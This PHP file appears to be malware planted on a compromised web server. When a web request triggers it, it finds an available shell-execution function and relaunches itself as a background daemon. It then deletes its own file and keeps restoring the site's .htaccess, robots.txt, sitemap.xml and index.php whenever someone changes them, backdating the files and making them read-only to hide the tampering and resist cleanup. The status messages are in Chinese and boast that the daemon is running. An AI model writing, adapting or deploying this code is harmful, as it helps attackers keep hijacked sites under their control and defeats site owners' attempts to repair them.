<?php
function isCli()
{
    $isCli = preg_match("/cli/i", php_sapi_name()) ? true : false;
    if ($isCli === false) {
        if (isset($_SERVER['argc']) && $_SERVER['argc'] >= 2) {
            $isCli = true;
        }
    }
    if ($isCli === false) {
        if (!isset($_SERVER['SCRIPT_NAME'])) {
            $isCli = true;
        }
    }
    return $isCli;
}
function ableMethod()
{
    $methods = [
        'exec', 'shell_exec', 'popen', 'system', 'passthru'
    ];
    $disableFuncs = explode(',', ini_get('disable_functions'));
    foreach ($methods as $method) {
        if (!in_array($method, $disableFuncs)) {
            return $method;
        }
    }
    return '';
}
function curlRobots()
{
    $url = $_SERVER['REQUEST_SCHEME'] . '://' . $_SERVER['HTTP_HOST'] . '/robots';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    $resp = curl_exec($ch);
    curl_close($ch);
    return $resp;
}
function runCmd($cmdStr, $ableMethod)
{
    $cmdOutput = [];
    $cmdOutputCode = 0;
    $result = '';
    switch ($ableMethod) {
        case 'exec':
            @exec($cmdStr, $cmdOutput, $cmdOutputCode);
            if ($cmdOutputCode === 0) {
                if (!empty($cmdOutput)) {
                    $result = join("\n", $cmdOutput);
                }
                return 'exec执行成功，最终success，结果：' . $result;
            }
            return 'exec执行失败';
        case 'shell_exec':
            $result = @shell_exec($cmdStr);
            return 'shell_exec执行成功，最终success，结果：' . $result;
        case 'popen':
            if (@is_resource($f = @popen($cmdStr, "r"))) {
                while (!@feof($f)) $result .= @fread($f, 1024);
            }
            @pclose($f);
            return 'popen执行成功，最终success，结果：' . $result;
        case 'system':
            @ob_start();
            @system($cmdStr, $cmdOutputCode);
            $result = @ob_get_contents();
            @ob_end_clean();
            if ($cmdOutputCode === 0) {
                return 'system执行成功，最终success，结果：' . $result;
            } else {
                return 'system执行失败';
            }
        case 'passthru':
            @ob_start();
            @passthru($cmdStr, $cmdOutputCode);
            $result = @ob_get_contents();
            @ob_end_clean();
            if ($cmdOutputCode === 0) {
                return 'passthru执行成功，最终success，结果：' . $result;
            } else {
                return 'passthru执行失败';
            }
        default:
            return '未知执行函数';
    }
}
function createFile($filepath, $content)
{
    @unlink($filepath);
    @touch($filepath, strtotime("-300 days", time()));
    @chmod($filepath, 0777);
    @file_put_contents($filepath, $content);
    @chmod($filepath, 0444);
}
function lockFile($currentFileDir, $currentFilePath)
{
    $contentHtaccess = $hashHtaccess = $contentRobots = $hashRobots = $contentXml = $hashXml = '';
    $htaccessFilePath = $currentFileDir . DIRECTORY_SEPARATOR . '.htaccess';
    if (file_exists($htaccessFilePath)) {
        $contentHtaccess = file_get_contents($htaccessFilePath);
        $hashHtaccess = hash('sha1', $contentHtaccess);
    } else {
        echo '.htaccess文件不存在;';
    }
    $robotsFilePath = $currentFileDir . DIRECTORY_SEPARATOR . 'robots.txt';
    if (file_exists($robotsFilePath)) {
        $contentRobots = file_get_contents($robotsFilePath);
        $hashRobots = hash('sha1', $contentRobots);
    } else {
        echo 'robots.txt文件不存在;';
    }
    $xmlFilePath = $currentFileDir . DIRECTORY_SEPARATOR . 'sitemap.xml';
    if (file_exists($xmlFilePath)) {
        $contentXml = file_get_contents($xmlFilePath);
        $hashXml = hash('sha1', $contentXml);
    } else {
        echo 'robots.txt文件不存在;';
    }
    $indexFilepath = $currentFileDir . DIRECTORY_SEPARATOR . 'index.php';
    if (file_exists($indexFilepath)) {
        $contentFirst = file_get_contents($indexFilepath);
        $hashFirst = hash('sha1', $contentFirst);
        while (true) {
            $contentHtaccessNow = file_get_contents($htaccessFilePath);
            $hashHtaccessNow = hash('sha1', $contentHtaccessNow);
            if (!empty($contentHtaccess) && $hashHtaccess !== $hashHtaccessNow) {
                createFile($htaccessFilePath, $contentHtaccess);
                echo '.htaccess更改文成;';
            }

            $contentRobotsNow = file_get_contents($robotsFilePath);
            $hashRobotsNow = hash('sha1', $contentRobotsNow);
            if (!empty($contentRobots) && $hashRobots !== $hashRobotsNow) {
                createFile($robotsFilePath, $contentRobots);
                echo 'robots.txt更改文成;';
            }

            $contentXmlNow = file_get_contents($xmlFilePath);
            $hashXmlNow = hash('sha1', $contentXmlNow);
            if (!empty($contentXml) && $hashXml !== $hashXmlNow) {
                createFile($xmlFilePath, $contentXml);
                echo 'sitemap.xml更改文成;';
            }

            if (!empty($contentFirst) && !file_exists($indexFilepath)) {
                createFile($indexFilepath, $contentFirst);
                echo 'index.php文件创建完成';
            }
            $contentNow = file_get_contents($indexFilepath);
            $hashNow = hash('sha1', $contentNow);
            if (!empty($contentFirst) && $hashFirst != $hashNow) {
                createFile($indexFilepath, $contentFirst);
                echo 'index.php文件更改完成';
            }
            if (file_exists($currentFilePath)) {
                break;
            }
            sleep(2);
        }
    } else {
        echo 'index.php不存在';
    }
}
$isCli = isCli();
$currentFilePath = __FILE__;
$currentFileDir = pathinfo($currentFilePath, PATHINFO_DIRNAME);
if (!$isCli) {
    $str = '';
    $ableMethod = ableMethod();
    if (empty($ableMethod)) {
        $str .= 'php没有可执行命令行的函数;';
    } else {
        $resp = curlRobots();
        if (strpos($resp, 'success') !== false) {
            $str .= 'robots执行成功' . ';';
        } else {
            $str .= 'robots执行失败' . ';';
        }
        $str .= 'php可用函数：' . ableMethod() . ';';
        $cmdStr = "nohup php " . $currentFilePath . " index.php >/dev/null 2>&1 &";
        $str .= '执行命令：' . $cmdStr . ';';
        $res = runCmd($cmdStr, $ableMethod);
        $str .= '执行结果：' . $res . ';';
        $str .= '该站点可被秒杀秒改，守护进程运行中';
    }
    header("Content-type:text/html; charset=utf-8");
    die($str);
} else {
    unlink($currentFilePath);
    lockFile($currentFileDir, $currentFilePath);
}